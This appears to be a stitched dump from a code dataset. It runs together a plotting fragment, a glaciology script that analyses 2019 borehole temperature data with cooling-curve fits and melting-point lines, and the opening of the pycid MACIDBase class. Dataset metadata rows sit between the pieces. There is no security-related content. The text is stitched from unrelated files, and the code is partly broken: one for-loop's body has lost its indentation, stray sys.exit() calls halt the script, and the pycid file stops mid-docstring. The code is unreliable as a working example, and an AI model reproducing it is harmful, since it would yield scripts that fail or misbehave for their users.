pfit, stats = Polynomial.fit(y_t_zone, T_t_zone, 1, full=True, window=(ymin, ymax),
    domain=(ymin, ymax))
#print('Raw fit results:', pfit, stats, sep='\n')
A0, m = pfit
resid, rank, sing_val, rcond = stats
rms = np.sqrt(resid[0]/len(y_t_zone))
print('Fit: T = {:.6f}m + {:.3f}'.format(m, A0),
      '(rms residual = {:.4f})'.format(rms))
pylab.plot(T_t_zone, y_t_zone, 'o', color='k')
pylab.plot(pfit(y_t_zone), y_t_zone, color='k')
pylab.xlabel('Temperature $^{o}C$')
pylab.ylabel('Depth (m)')
plt.gca().invert_yaxis()
pylab.show()
| 39.386404 | 194 | 0.692692 | #script to plot results from 1_full_process.py
#science advances figure guidelines. Preferably 2.5, 5.0, or 7.3 inches wide
#and no more than 11.0 inches high. Miminum line width of 0.5 pt. 9 pt and
#bold for e.g. A, B, C, etc.
#Robert Law, Scott Polar Research Institute, University of Cambridge, 2020. rl491@cam.ac.uk
import os
import sys
import glob
import scipy
import pylab
import seaborn
import datetime
import matplotlib
import numpy as np
import xarray as xr
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.patches as patch
import matplotlib.ticker as mticker
from matplotlib.ticker import MultipleLocator
Polynomial = np.polynomial.Polynomial
os.chdir(os.path.dirname(sys.argv[0]))
from T0_curve_fitting import fit_model, plot_model
#define functions
def func(x, Q, s, T_0):
    """Line-source cooling curve: T(x) = Q / (4*pi*k_i*(x - s)) + T_0.

    x is elapsed time (s), Q a heat-input amplitude, s a time offset and
    T_0 the asymptotic (equilibrium) temperature extrapolated by the fit.
    """
    # [W m^-1 K^-1] Thermal conductivity of pure ice
    # From Ryser et al. [2014, Thesis, p. 20]
    k_i = 2.10
    amplitude = Q / (4 * np.pi * k_i)
    return amplitude * (1 / (x - s)) + T_0
#inputs
file_path_end = 'processed_data/ch1_end_processed.nc'
file_path_full = 'processed_data/ch1_full_processed.nc'
plot_date = datetime.datetime(2019, 8, 14, 0, 0, 0) #date for plotting in datetime format
av_date = datetime.datetime(2019, 8, 10, 0, 0, 0) #date for averaging where in use. Takes average from av_date to plot_date
bh_depth = 1042.95 #(m) from Sam Doyle BH19c depth email thread
bh_depth_dts = 1062. #(m) BH19c depth from DTS with refractive index error
z_start = 204. #(m) z value where cable first enters ice (in non corrected distance)
fs = 8
close_up_depth = 970 #(m) depth for basal close up to begin from
CTZ_lower = 982 #(m) interpreted depth of bottom of the CTZ
max_T = 1 #(deg C) maximum temperature for image plot
min_T = -22 #(deg C) minimum temperature for image plot
pmp_allow = 0.0 #(K) how far to allow pmp away from calculated value to include in temperate zone #WHERE TO DEFINE THIS AS? 0.075 FOR FIGURE, BUT LOWER VALUE WORKS BETTER FOR ANLYSIS.
equib_cut = 35 #(ind) depth cut to remove top section where cooling is not clearly exponential
fail_depth = (1109.5 - z_start)*(bh_depth/bh_depth_dts) #(m) at which point did the cable fail?
#input params. This is a bit of an art, check the animated plot to come up with good values for the particular input
equib_start = 1 #index for start of steepest gradient hunt
equib_end = 20 #index for end of gradient hunt
grad_max_pos = 4 #so e.g.1 = start data from 1 after max gradient, -1 = 1 before max gradient etc.
#constants (i.e. things that definitely won't change unless some seriously strange shit happens)
T0 = 273.15 #(K) 0 degrees C in Kelvin
Ttr = 273.16 #(K) triple point temperature of water
ptr = 611.73 #(Pa) triple point pressure of water
g = 9.81 #(m/s^2) gravitational acceleration
Bs = 1.86 #(K kg mol^-1) constant for pmp calculations from Cuffey and Paterson following Lliboutry (1976)
#parameters (i.e. things that could change)
ccc = 9.14e-8 #(K/Pa) Clausius-Clapeyron constant
ccc2 = 9.14e-8 #(K/Pa) for water and solute load analysis. This value keeps the pmp line away from from the obvserved at all points
slope = 0.96 #(degrees) slope under borehole
rho_ice = 910. #(kg/m^3) ice density
#load datasets
ds_end = xr.open_dataset(file_path_end)
ds_full = xr.open_dataset(file_path_full)
#ds_end.tmpw.isel(t = -1).plot(linewidth = 0.7)
#plt.show()
print(ds_end)
print(ds_full)
sys.exit()
#correct depth
ds_end.z.values = (ds_end.z.values - z_start)*(bh_depth/bh_depth_dts)
ds_full.z.values = (ds_full.z.values - z_start)*(bh_depth/bh_depth_dts)
#extract useful part
#ds_end = ds_end.isel(t = -1)
#load data from Sam Doyle
Doyle_df = pd.read_csv('Doyle_data/analog_blue.csv')
Doyle_dt_val = Doyle_df.loc[:,'datetime'].values #datetime values
Doyle_dt_list = list(Doyle_dt_val) #datetime list
Doyle_dts = [datetime.datetime.strptime(x, r'%d/%m/%Y %H:%M') for x in Doyle_dt_list]
Doyle_dt_np = np.array(Doyle_dts) #into np array
#get plotting index
ind_date_Doyle = np.argmax(Doyle_dt_np > plot_date)
av_ind_date_Doyle = np.argmax(Doyle_dt_np > av_date)
#get T values from Doyle_df
T1 = Doyle_df.loc[ind_date_Doyle,"T1"]
T2 = Doyle_df.loc[ind_date_Doyle,"T2"]
T3 = Doyle_df.loc[ind_date_Doyle,"T3"]
T4 = Doyle_df.loc[ind_date_Doyle,"T4"]
T5 = Doyle_df.loc[ind_date_Doyle,"T5"]
T_doyle = np.array([T1, T2, T3, T4, T5])
#means
av_T1 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T1"])
av_T2 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T2"])
av_T3 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T3"])
av_T4 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T4"])
av_T5 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T5"])
av_T_doyle = np.array([av_T1, av_T2, av_T3, av_T4, av_T5])
#stds
std_T1 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T1"])
std_T2 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T2"])
std_T3 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T3"])
std_T4 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T4"])
std_T5 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T5"])
std_T_doyle = np.array([std_T1, std_T2, std_T3, std_T4, std_T5])
#manualy input thermistor depths (T1:T5)
T_depths = np.array([0.28, 1, 3, 5.04, 10.05])
T_depths = bh_depth - T_depths
#set scatter coords
x_scat = T_doyle
y_scat = T_depths
#Clausius-Clapeyron calculation
p_ice = rho_ice*g*ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start))*np.cos(np.deg2rad(slope))
T_pmp_cc = Ttr - ccc*(p_ice - ptr)
T_pmp_cc_w_sol = Ttr - ccc2*(p_ice - ptr) #for water and solute load analysis
#obtain indicies
depth_ind = np.argmax(ds_end.z.values > bh_depth)
#start_ind = np.argmax(ds_end.z.values > z_start) - 1
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
#figure 1. Time series image plot with close ups for solute load and water content
#image plot
y = ds_full.z.values
T = ds_full.tmpw.sel(z = slice(0+z_start, bh_depth+z_start)).values
close_up_ind = np.argmax(y > close_up_depth)
temp_min = -0.85
temp_max = -0.75
#create image of temperate zone
pmp_cut = T_pmp_cc
pmp_cut_w_sol = T_pmp_cc_w_sol
pmp_im = np.zeros(np.shape(T)) #pmp image
pmp_im_w_sol = np.zeros(np.shape(T)) #pmp image for water and solute analysis
pmp_ind = np.zeros(pmp_im.shape[1])
for i in range(pmp_im.shape[1]):
pmp_im[:,i] = pmp_cut
pmp_im_w_sol[:,i] = pmp_cut_w_sol
pmp_im_w_sol = pmp_im_w_sol - T0 #w_sol means for water and solute analysis
pmp_im = pmp_im - pmp_allow - T0
#find where temperate zone is exceeded
pmp_dif = T - pmp_im
pmp_dif_w_sol = pmp_im_w_sol - T
pmp_ind = np.greater(pmp_dif, np.zeros(np.shape(T)))
matplotlib.rcParams.update({'font.size': fs})
x_lims = mdates.date2num(ds_full.t.values)
fig1 = plt.figure(figsize = (7.3,130/25.4), constrained_layout=True)
gs = fig1.add_gridspec(10,20)
ax1a = fig1.add_subplot(gs[:6,:-1]) #main image
ax1b = fig1.add_subplot(gs[:6,-1]) #T colorbar
ax1c = fig1.add_subplot(gs[6:8,:-1]) #close up temperate zone T
ax1d = fig1.add_subplot(gs[6:8,-1]) #T colorbar for close up
ax1e = fig1.add_subplot(gs[8:10,:-1]) #water content
ax1f = fig1.add_subplot(gs[8:10,-1]) #water content colourbar
#main image
ax1a.imshow(T, vmin=min_T, vmax=max_T, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
ax1a.hlines(close_up_depth, x_lims[0], x_lims[-1], colors = 'r', lw=0.75, linestyles='dashed')
#print(T)
#ax1a.contour(T, levels = [-25, -20, -15, -10, -5, 0])
#ax1a.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'white', lw=0.8, linestyles='dashed')
#ax1a.contour( pmp_ind, levels=[0], colors='white', linewidths=0.75, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1a_contours = ax1a.contour( T, levels=[-25, -20, -15, -10, -5, 0], colors='white', linewidths=0.75, aspect='auto',
extent = [x_lims[0], x_lims[-1], 0, bh_depth])
#ax1a.clabel(ax1a_contours, fontsize = fs)
#ax1a.set_ylim([bh_depth, 0])
#ax1a.xaxis.set_tick_params(rotation=30)
ax1a.xaxis_date()
ax1a.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
ax1a.set_ylabel(' ', fontsize= fs)
days = mdates.DayLocator()
ax1a.xaxis.set_minor_locator(days)
ax1a.set_xticklabels([])
#create T colorbar as seperate plot
cbar_plot1 = np.zeros((1000, 2))
cbar_plot1[:,0] = np.linspace(max_T, min_T, 1000)
cbar_plot1[:,1] = np.linspace(max_T, min_T, 1000)
im2 = ax1b.imshow( cbar_plot1, aspect='auto', cmap='viridis',
extent = [0, 1, min_T, max_T])
ax1b.set_xticks([])
ax1b.set_yticks(np.arange(min_T, max_T, 1), minor=True)
ax1b.yaxis.set_label_position("right")
ax1b.yaxis.tick_right()
ax1b.tick_params(axis='y', which='minor')
#ax1b.set_ylabel('Temperature ($^\circ$ C)')
#temp close up
ax1c.imshow(T, vmin=temp_min, vmax=temp_max, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#ax1c.contour(pmp_ind, levels=[0], colors='white', linewidths=1, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1c.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'black', lw=0.75, linestyles='dashed')
ax1c.set_ylim([bh_depth, close_up_depth])
#ax1a.xaxis.set_tick_params(rotation=30)
ax1c.xaxis_date()
ax1c.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
days = mdates.DayLocator()
ax1c.xaxis.set_minor_locator(days)
ax1c.set_xticklabels([])
#create T colorbar as seperate plot
cbar_plot2 = np.zeros((1000, 2))
cbar_plot2[:,0] = np.linspace(temp_max, temp_min, 1000)
cbar_plot2[:,1] = np.linspace(temp_max, temp_min, 1000)
im3 = ax1d.imshow( cbar_plot2, aspect='auto', cmap='viridis',
extent = [0, 1, temp_min, temp_max])
ax1d.set_xticks([])
ax1d.set_yticks(np.arange(temp_min, temp_max, 0.025), minor=True)
ax1d.yaxis.set_label_position("right")
ax1d.yaxis.tick_right()
ax1d.tick_params(axis='y', which='minor')
#ax1d.set_ylabel(' ', fontsize= fs)
#^^^^^^^^^^^^^^^^^^^^^^^^^^
#temperature deviation (n)
n_min = -0.03 #minimum salt concentration for plotting
n_max = 0.03 #maximum salt concentration for plotting
n = pmp_dif_w_sol
ax1e.imshow(n, vmin=n_min, vmax=n_max, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#ax1e.contour(pmp_ind, levels=[0], colors='white', linewidths=1, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1e.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'black', lw=0.75, linestyles='dashed')
ax1e.set_ylim([bh_depth, close_up_depth])
#ax11a.xaxis.set_tick_params(rotation=30)
ax1e.xaxis_date()
ax1e.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
ax1e.set_xlabel('Date (2019)', fontsize= fs)
days = mdates.DayLocator()
ax1e.xaxis.set_minor_locator(days)
#create salt concentration colorbar as seperate plot
cbar_plot4 = np.zeros((1000, 2))
cbar_plot4[:,0] = np.linspace(n_max, n_min, 1000)
cbar_plot4[:,1] = np.linspace(n_max, n_min, 1000)
im3 = ax1f.imshow(cbar_plot4, aspect='auto', cmap='viridis',
extent = [0, 1, n_min, n_max])
ax1f.set_xticks([])
#ax1f.set_yticks(np.arange(n_min, n_max, 1), minor=True)
ax1f.yaxis.set_label_position("right")
ax1f.yaxis.tick_right()
ax1f.tick_params(axis='y', which='minor')
f = mticker.ScalarFormatter(useOffset=False, useMathText=True)
#format = lambda x,pos : "${}$".format(f._formatSciNotation('%1.10e' % x))
#ax1f.yaxis.set_major_formatter(mticker.FuncFormatter(format))
#ax1f.set_ylabel('Salt concentration (mol/kg)', fontsize= fs)
ax1f.set_ylabel('\n ')
#^^^^^^^^^^^^^^^^^^^^
#text labels
fig1.text(0.01, 0.5, 'Depth (m)', va='center', rotation='vertical', fontsize = fs)
fig1.text(0.96, 0.40, 'Temperature ($^\circ$C)', va='center', rotation='vertical', fontsize = fs)
text1 = fig1.text(0.96, 0.135, 'Temperature\ndeviation ($^\circ$C)', va='center', rotation='vertical', fontsize = fs)
text1.set_multialignment('center')
#text2 = fig1.text(0.96, 0.15, 'Solute\nconcentration', va='center', rotation='vertical', fontsize = fs)
#text2.set_multialignment('center')
#fig1.savefig('figures/T_series.png', dpi=600, bbox_inches = 'tight', pad_inches = 0)
plt.show()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
#figure 5. 3 part profile plot (full, gradient, temperate zone close up) with rectangle cut outs
#EQUILIBRIUM ANALYSIS: FULL LOOP
#get time in seconds
t = ds_full.t.values
xdata = [float((t[i] - t[0])*(1e-9)) for i in range(len(t))]
xdata = np.array(xdata)
xdata = xdata - xdata[0] + 1 #add a second on to prevent 0 value
T_equib = T
#create empty arrays
ice_T_0 = np.squeeze(np.zeros([1, T.shape[0]]))
ice_T_0[:] = np.nan
RMSE_T_0 = np.squeeze(np.zeros([1, T.shape[0]]))
RMSE_T_0[:] = np.nan
#input params. This is a bit of an art, check the animated plot to come up with good values for the particular input
equib_start = 1 #index for start of steepest gradient hunt
equib_end = 20 #index for end of gradient hunt
grad_max_pos = 4 #so e.g.1 = start data from 1 after max gradient, -1 = 1 before max gradient etc.
#for loop for each depth
#for i in range(T_equib.shape[0]):
print('Running equilibrium loop..')
#y_equib = ds_full.z.isel(z = slice(equib_cut, 3766))
#Fit the line-source cooling model func() to the post-drilling temperature
#decay at each depth and extrapolate the equilibrium ice temperature T_0.
#NOTE(review): the stop index 8300 is hard-coded — presumably T.shape[0];
#confirm it matches the dataset before reuse.
for i in range(equib_cut, 8300):
    #temperature time series at this depth
    ydata = T_equib[i,:]
    #time-gradient of the decay curve
    ydata_grad = np.gradient(ydata)
    #index of steepest cooling (most negative gradient) within the hunt window
    grad_max = np.argmin(ydata_grad[equib_start:equib_end])
    #index from which to begin the fit (grad_max is relative to equib_start,
    #then shifted by grad_max_pos samples)
    exp_ind = grad_max + grad_max_pos - equib_start
    #x and y data actually passed to the fit
    xdata_loop = xdata[exp_ind:]
    ydata_loop = ydata[exp_ind:]
    #fit T(t) = Q/(4*pi*k_i*(t - s)) + T_0
    popt, pcov = scipy.optimize.curve_fit(func, xdata_loop, ydata_loop, p0=(0,0,0))
    #record extrapolated equilibrium temperature
    ice_T_0[i] = popt[2]
    #RMSE of the fit residuals, used later as an uncertainty band
    Q = popt[0]
    s = popt[1]
    residuals = (ydata_loop - func(xdata_loop, Q, s, ice_T_0[i]))
    RMSE_T_0[i] = np.sqrt(np.mean(residuals**2))
#plot values
y = ds_end.z.values
y_equib = ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start)).values
co_T1 = -17.9
co_T2 = -17.0
co_d1 = 200
co_d2 = 240
a = 0.5
#Clausius-Clapeyron calculation (seperate to figure 1 as easier to keep coords seperate)
p_ice = rho_ice*g*y*np.cos(np.deg2rad(slope))
T_pmp_cc = Ttr - ccc*(p_ice - ptr)
fig5, (ax5a, ax5b, ax5c) = plt.subplots(1,3)
fig5.set_size_inches(7.3,140/25.4)
fig5.subplots_adjust(wspace = 0.23)
T_mean_grad = np.gradient(ds_end.tmpw, ds_end.z)
ax5b.scatter(-0.0815, 105, color='orange')
ax5b.plot(T_mean_grad, y, lw = 0.25, label = 'Temperature gradient', color='k')
ax5b.invert_yaxis()
ax5b.set_xlim([-0.3, 0.3])
ax5b.set_ylim([bh_depth,0]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5b.set_xlabel("Temperature gradient ($^\circ$C m$^-1$)")
ax5b.locator_params(axis='x', nbins=6)
ax5b.grid(True)
ax5b.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
#ax5b.set_yticklabels([])
ax5a.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5a.fill_betweenx(y_equib, ice_T_0 + 0.5*RMSE_T_0, ice_T_0 - 0.5*RMSE_T_0, facecolor='k', alpha=0.8, edgecolor='r', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5a.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5a.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5a.scatter(x_scat, y_scat, s=20, facecolors='none', edgecolors='black', zorder=6, label='Thermistor data')
ax5a.invert_yaxis()
ax5a.set_xlim([-25, 2])
ax5a.set_ylim([bh_depth,0]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5a.set_xlabel("Temperature ($^\circ$C)")
ax5a.set_ylabel("Depth (m)")
ax5a.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax5a.grid(True)
rect1 = patch.Rectangle((co_T1, co_d2), co_T2 - co_T1, co_d1 - co_d2, linewidth=1, facecolor='none', edgecolor = 'k')
ax5a.add_patch(rect1)
rect2 = patch.Rectangle((-6, 880), 6.5, bh_depth - 880, linewidth=1, facecolor='none', edgecolor = 'k')
ax5a.add_patch(rect2)
ax5c.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5c.plot(ds_end.tmpw, y, lw=1, label='Temperature', zorder=3, color='k')
ax5c.scatter(av_T_doyle, y_scat, s=20, facecolors='none', edgecolors='black')
ax5c.errorbar(av_T_doyle, y_scat, xerr=std_T_doyle, linestyle='None', linewidth=1)
ax5c.invert_yaxis()
ax5c.set_xlim([-6, -0.5]) #orig = [-25, 2], temp zone = [-1.5, -0.5]quit()
ax5c.set_ylim([bh_depth, 880]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5c.plot(T_pmp_cc - T0, y, zorder=1, lw=1, label='T_pmp')
ax5c.set_xlabel("Temperature ($^\circ$C)")
ax5c.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax5c.grid(True)
#rect3 = patch.Rectangle((-0.95, bh_depth - 85), 0.3, bh_depth - 85, linewidth=1, facecolor='none', edgecolor = 'k')
#ax5c.add_patch(rect3)
#cut out
xspacing = 0.1
yspacing = 5
minorlocatorx = MultipleLocator(xspacing)
majorlocatory = MultipleLocator(yspacing)
ax5d = fig5.add_axes([0.225, 0.46, 0.1, 0.21])
ax5d.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5d.fill_betweenx(y_equib, ice_T_0 + 0.5*RMSE_T_0, ice_T_0 - 0.5*RMSE_T_0, facecolor='k', alpha=a, edgecolor='r', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5d.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5d.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5d.invert_yaxis()
ax5d.set_xlim([co_T1, co_T2])
ax5d.set_ylim([co_d2,co_d1]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5d.xaxis.set_minor_locator(minorlocatorx)
#ax5d.yaxis.set_minor_locator(majorlocatory)
ax5d.grid(which='major')
ax5d.grid(which='minor')
ax5e = fig5.add_axes([0.73, 0.15, 0.1, 0.43])
ax5e.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5e.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5e.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5e.scatter(av_T_doyle, y_scat, s=20, facecolors='none', edgecolors='black')
ax5e.errorbar(av_T_doyle, y_scat, xerr=std_T_doyle, linestyle='None', linewidth=1)
ax5e.invert_yaxis()
ax5e.plot(T_pmp_cc - T0, y, zorder=1, lw=1, label='T_pmp')
ax5e.set_xlim([-0.95, -0.65])
ax5e.set_ylim([bh_depth, bh_depth - 85]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5e.xaxis.set_minor_locator(minorlocatorx)
ax5e.yaxis.set_minor_locator(majorlocatory)
ax5e.grid(which='major')
ax5e.grid(which='minor')
#fig5.savefig('figures/T_profile_mean4.png', dpi=600, bbox_inches = 'tight', format = 'png')
plt.show()
#plt.close('all')
#save outdatacd
data_out = np.column_stack((y, ds_end.tmpw))
#np.savetxt('results/T_profile.txt', data_out)
#clausius clapeyron calculation for each time step
sys.exit()
y_2 = ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start)).values #introducing second y cut to region of interest
#for loop to run over area within temperate zone and calculate clausius clapeyron slope and goodness of fit
#create output array
rms_out = np.zeros(len(t)) #store root mean square error
r2_out = np.zeros(len(t)) #r squared value
cc_out = np.zeros(len(t)) #store Clausius Clapeyron
#get index where passes inferred CTZ
#index of the first depth sample below the inferred CTZ top (982 m)
t_zone_top = [ n for n,i in enumerate(y_2) if i>982 ][0]
#For every time step, fit a straight line T(z) through the temperate zone and
#record its slope (the apparent Clausius-Clapeyron gradient), RMS misfit and R^2.
for i in range(len(t)):
    #prepare regression inputs
    #t_zone_top = min([j for j, x in enumerate(pmp_ind[:,i]) if x])
    #print(t_zone_top)
    T_full = np.squeeze(T[:,i])
    t_zone_ind = np.squeeze(pmp_ind[:,i]) #NOTE(review): unused in this loop
    T_t_zone = T_full[t_zone_top:]
    y_t_zone = y_2[t_zone_top:]
    #perform regression
    #m = slope, A0 = intercept
    ymin, ymax = min(y_t_zone), max(y_t_zone)
    pfit, stats = Polynomial.fit(y_t_zone, T_t_zone, 1, full=True, window=(ymin, ymax),
        domain=(ymin, ymax))
    #print('Raw fit results:', pfit, stats, sep='\n')
    A0, m = pfit
    resid, rank, sing_val, rcond = stats
    rms = np.sqrt(resid[0]/len(y_t_zone))
    #separate linregress call just to obtain R^2
    #NOTE(review): this rebinds the module-level name 'slope' (borehole slope,
    #0.96 deg) — harmless here since p_ice was computed earlier, but fragile.
    slope, intercept, r_value, p_value, std_err = scipy.stats.linregress(y_t_zone, T_t_zone)
    #print('Fit: T = {:.6f}m + {:.3f}'.format(m, A0),
    #      '(rms residual = {:.4f})'.format(rms))
    #pylab.plot(T_t_zone, y_t_zone, 'o', color='k')
    #pylab.plot(pfit(y_t_zone), y_t_zone, color='k')
    #pylab.xlabel('Temperature $^{o}C$')
    #pylab.ylabel('Depth (m)')
    #plt.gca().invert_yaxis()
    #pylab.show()
    #save outputs
    rms_out[i] = rms
    r2_out[i] = r_value**2
    cc_out[i] = m #slope stored in K m-1; conversion to K MPa-1 happens only at plot time
plt.plot(t, -0.8 - 1043*cc_out)
plt.show()
plt.plot(t, (-cc_out/(rho_ice*g))*1e6)
#plt.plot(t, (rms_out/(rho_ice*g))*1e6)
plt.show()
plt.plot(t, r2_out)
plt.show()
#seperate plots
#t_zone_top = min([j for j, x in enumerate(pmp_ind[:,i]) if x])
#print(t_zone_top)
#Repeat the temperate-zone regression for a single time step (index 120) and
#show the fit as scatter (data) plus line (fit).
T_full = np.squeeze(T[:,120])
t_zone_ind = np.squeeze(pmp_ind[:,120]) #NOTE(review): unused
T_t_zone = T_full[t_zone_top:]
y_t_zone = y_2[t_zone_top:]
#perform regression
#m = slope, A0 = intercept
ymin, ymax = min(y_t_zone), max(y_t_zone)
pfit, stats = Polynomial.fit(y_t_zone, T_t_zone, 1, full=True, window=(ymin, ymax),
    domain=(ymin, ymax))
#print('Raw fit results:', pfit, stats, sep='\n')
A0, m = pfit
resid, rank, sing_val, rcond = stats
rms = np.sqrt(resid[0]/len(y_t_zone))
print('Fit: T = {:.6f}m + {:.3f}'.format(m, A0),
      '(rms residual = {:.4f})'.format(rms))
pylab.plot(T_t_zone, y_t_zone, 'o', color='k')
pylab.plot(pfit(y_t_zone), y_t_zone, color='k')
pylab.xlabel('Temperature $^{o}C$')
pylab.ylabel('Depth (m)')
plt.gca().invert_yaxis()
pylab.show()
| 172 | 0 | 23 |
4d372a822f3fd4bf37c1514539f86c1b3f30550b | 19,807 | py | Python | pycid/core/macid_base.py | sbenthall/pycid | 114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf | [
"Apache-2.0"
] | 1 | 2020-05-29T10:18:59.000Z | 2020-05-29T10:18:59.000Z | pycid/core/macid_base.py | sbenthall/pycid | 114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf | [
"Apache-2.0"
] | 2 | 2020-06-07T09:37:40.000Z | 2020-08-06T23:15:54.000Z | pycid/core/macid_base.py | sbenthall/pycid | 114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf | [
"Apache-2.0"
] | 2 | 2020-05-28T16:35:11.000Z | 2020-05-28T16:39:05.000Z | from __future__ import annotations
import itertools
import math
from functools import lru_cache
from typing import (
Any,
Callable,
Collection,
Dict,
Hashable,
Iterable,
Iterator,
KeysView,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Union,
)
from warnings import warn
import matplotlib.cm as cm
import networkx as nx
import numpy as np
from pgmpy.factors.discrete import TabularCPD
from pgmpy.inference.ExactInference import BeliefPropagation
from pycid.core.causal_bayesian_network import CausalBayesianNetwork, Relationship
from pycid.core.cpd import DecisionDomain, Outcome, StochasticFunctionCPD
from pycid.core.relevance_graph import RelevanceGraph
AgentLabel = Hashable # Could be a TypeVar instead but that might be overkill
class MACIDBase(CausalBayesianNetwork):
"""Base structure of a Multi-Agent Causal Influence Diagram.
Attributes
----------
agent_decisions: The decision nodes of each agent.
A dictionary mapping agent label => nodes labels.
agent_utilities: The utility nodes of each agent.
A dictionary mapping agent label => node labels.
decision_agent: The agent owner of each decision node.
A dictionary mapping decision node label => agent label.
utility_agent: The agent owner of each utility node.
A dictionary mapping utility node label => agent label.
"""
def __init__(
self,
edges: Iterable[Tuple[str, str]] = None,
agent_decisions: Mapping[AgentLabel, List[str]] = None,
agent_utilities: Mapping[AgentLabel, List[str]] = None,
**kwargs: Any,
):
"""Initialize a new MACIDBase instance.
Parameters
----------
edges: A set of directed edges. Each is a pair of node labels (tail, head).
agent_decisions: The decision nodes of each agent.
A mapping of agent label => nodes labels.
agent_utilities: The utility nodes of each agent.
A mapping of agent label => node labels.
"""
super().__init__(edges=edges, **kwargs)
self.agent_decisions = dict(agent_decisions) if agent_decisions else {}
self.agent_utilities = dict(agent_utilities) if agent_utilities else {}
self.decision_agent = {node: agent for agent, nodes in self.agent_decisions.items() for node in nodes}
self.utility_agent = {node: agent for agent, nodes in self.agent_utilities.items() for node in nodes}
@property
def decisions(self) -> KeysView[str]:
"""The set of all decision nodes"""
return self.decision_agent.keys()
@property
def utilities(self) -> KeysView[str]:
"""The set of all utility nodes"""
return self.utility_agent.keys()
@property
def agents(self) -> KeysView[AgentLabel]:
"""The set of all agents"""
return self.agent_utilities.keys()
def make_decision(self, node: str, agent: AgentLabel = 0) -> None:
""" "Turn a chance or utility node into a decision node.
- agent specifies which agent the decision node should belong to in a MACID.
"""
self.make_chance(node)
if agent not in self.agent_decisions:
self.agent_decisions[agent] = [node]
else:
self.agent_decisions[agent].append(node)
self.decision_agent[node] = agent
def make_utility(self, node: str, agent: AgentLabel = 0) -> None:
""" "Turn a chance or utility node into a decision node."""
self.make_chance(node)
if agent not in self.agent_utilities:
self.agent_utilities[agent] = [node]
else:
self.agent_utilities[agent].append(node)
self.utility_agent[node] = agent
def make_chance(self, node: str) -> None:
"""Turn a decision node into a chance node."""
if node not in self.nodes():
raise KeyError(f"The node {node} is not in the (MA)CID")
elif node in set(self.decisions):
agent = self.decision_agent.pop(node)
self.agent_decisions[agent].remove(node)
elif node in set(self.utilities):
agent = self.utility_agent.pop(node)
self.agent_utilities[agent].remove(node)
def query(
self, query: Iterable[str], context: Dict[str, Outcome], intervention: Dict[str, Outcome] = None
) -> BeliefPropagation:
"""Return P(query|context, do(intervention))*P(context | do(intervention)).
Use factor.normalize to get p(query|context, do(intervention)).
Use context={} to get P(query).
Parameters
----------
query: A set of nodes to query.
context: Node values to condition upon. A dictionary mapping of node => outcome.
